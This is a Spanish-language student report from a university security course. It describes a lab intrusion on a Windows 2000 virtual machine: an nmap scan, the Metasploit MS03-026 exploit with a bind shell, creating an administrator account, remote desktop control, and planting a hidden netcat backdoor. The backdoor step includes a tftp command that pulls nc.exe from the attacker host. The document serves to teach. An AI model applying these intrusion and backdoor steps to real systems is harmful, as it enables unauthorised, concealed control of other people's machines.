Informe Ataque informatico

1 Seguridad Informática

UNPRG- ING. DE SISTEMAS

Universidad Nacional “Pedro Ruiz Gallo” FACULTAD DE INGENIERÍA CIVIL SISTEMAS Y ARQUITECTURA

Escuela Profesional de ingeniería de Sistemas

ALUMNOS:

Chávez Carranza, MARCO

CURSO:

Seguridad Informática

DOCENTE:

Puicán, ROBERTO

Lambayeque, 2010

INTROMISION A UN SISTEMA

OPERATIVO



ATAQUE INFORMÁTICO EJECUCIÓN

Se Desea hacer una intromisión desde BackTrack-4 a un computador con Sistema Operativo Windows Server 2000. PASO I (Reconocimiento de Nuestra Víctima)

Sabiendo el IP del computador víctima, nos queda averiguar los puertos vértices de ataque, para lo cual utilizaremos un Software de Mapeo (NMAP).

Como comando de mapeo utilizaremos a: <nmap –vv –P0 -sT> un TCP Connect(), solo queremos averiguar que puertos pueden estar abiertos y dirigir hacia {el nuestro ataque, el sondeo se ejecutara de esta manera:

o NMAP:



o Comando de Sondeo:

o Resultados:



Éstos resultados nos muestran que puertos están sensible a ataques,, de los cuales elegiremos el

445 para nuestro caso, sin embargo podemos utilizar cualquiera de estos para nuestra pruebas, y

verificar la posibilidad de una intromisión de alguno de ellos

o Computador Víctima:

Ya tenemos reconocido el computador víctima Ahora!

PASO II (GENERALIDADES DEL ATACANTE)

o Software Atacante



Para trabajar en modo visual iniciamos el proceso STARTX, además necesitamos iniciar el proceso

de Red para que BT4 reconozca la NIC instalada mediante el comando </etc/init.d/Networking

Start>, haremos esto antes de iniciar el STARTX, sin embargo podemos iniciarlo ya desde modo

visual ingresando a TERMINAL y escribimos el mismo comando

o Esperamos a cargar el sistema Tenemos el modo visual iniciado y verificamos en la direccion <Inicio->Settings->Internet & network-<>NetWork interfaces> visualizamos entonces la NIC de nuestra PC atacante.



Ttenemos ahora lo necesario para hacer nuestra intromisión, Sigue!

PASO III (Ataque Propiamente Dicho)

o Carga de Servicios Necesarios: Cargamos el proceso: framework2-Msfweb <Inciio->BackTrack->Penetration->Metastploit Explotation framework->MsfWeb>

Para realizar la intromisión de software malicioso en un Sistema operativo, necesitamos

un puerto abierto, ademas de una aplicación que explote este puerto de modo que la

deje en modo Expuesto, de esta manera tomaremos el control de dicha

maquina, para lograr esto necesitamos un Exploit «Pieza de

software, un fragmento de datos, o una secuencia de comandos

con el fin de automatizar el aprovechamiento de un error, fallo o

vulnerabilidad, a fin de causar un comportamiento no deseado o

imprevisto en los programas informáticos, hardware, o

componente electrónico (por lo general computarizado) », dicho

esto, buscaremos los exploits disponibles, para lo cual ya hemos

levantado el proceso MSFWEB, y ahora desde el Firefox se nos serán

visibles.

http://es.wikipedia.org/wiki/Software

http://es.wikipedia.org/wiki/Comando_(inform%C3%A1tica)



o Desde el Firefox

En la barra de direcciones ingresaremos al localhost:55555, y nos ubicamos en EXPLOITS



Buscamos el Exploit según el Sistema operativo atacado, en nuestro Caso es un Windows Server 2000 de modo que es tipo Win32>

Usaremos el Exploit «Microsoft RPC DCOM MS03-026»



Seleccnionamos el Destino que en este Caso es 0-WindowsNT SP3-6ª/2K/XP/2K/Eng…

Utilizaremos la aplicación win32_bind



Le indicamos el Ip del Computador Víctima «192.168.1.18»y como podemos ver el puerto vulnerable es el 135 -msrpc, puerto que a su vez se encuentra abierto en el sistema operativo según el mapeo realizado anteriormente.



En adelante tenemos la Shell remota y podemos tomar control de la maquina , por lo pronto hemos ingresado a su Sistema y tenemos Control Sobre su MS-DOS. A partir de ahora, teniendo el acceso remoto a la Shell del Computador Víctima, usaremos un software de control de comandos remotos, en este caso usaremos el AWRC (Atelier Web Remote Commander), que lo podemos descargar en (http://www.megaupload.com/?d=ZTATY555). Teniedo este acceso podemos crear un usuario, y posteriormente incluirle en el grupo de administradores.

http://www.megaupload.com/?d=ZTATY555



PASO IV (Obtener un Escritorio Remoto)

Con Ayuda del Atelier Web Remote Commander que será instalada en un computador aleatoriamente ubicado, conectado en red con el resto de computadores, para nuestro caso como estamos trabajado con maquinas virtuales (Computador Atacante – Computador Víctima) el host del AWRC sera nuestra maquina Física, tendremos control sobre el computador Víctima:



Ahora estamos viendo la vista en paralelo del control remoto sobre el computador víctima, a la derecha es el escritorio desde AWRC y a la izquierda es la maquina real.



PASO IV (BackDoor en la Maquina Atacada)

Despues de haber obtenido un escritorio remoto mediante AWRC, ponemos un backdoor para contolar de manera remora pero a la vez de manera oculta para el host atacado.

En el terminal del Backtrack ingresamos en:

Dentro del terminal en BackTrack escribimos:

o cd /ls/pentest/windows-binaries/tools

Localizamos el archivo nc.exe y lo copiamos con “cp nc.exe /tmp”.

Lo verificamos con “ls/tmp”.

Escribimos en Comand de BackTrack en la sesion iniciada con el exploit: “tftp -i 192.168.1.207 get nc.exe C:\nc.exe”



Ahora editamos el registro



nc –p 69 192.168.1.34 69

Informe Ataque informatico

Documents

Transcript of Informe Ataque informatico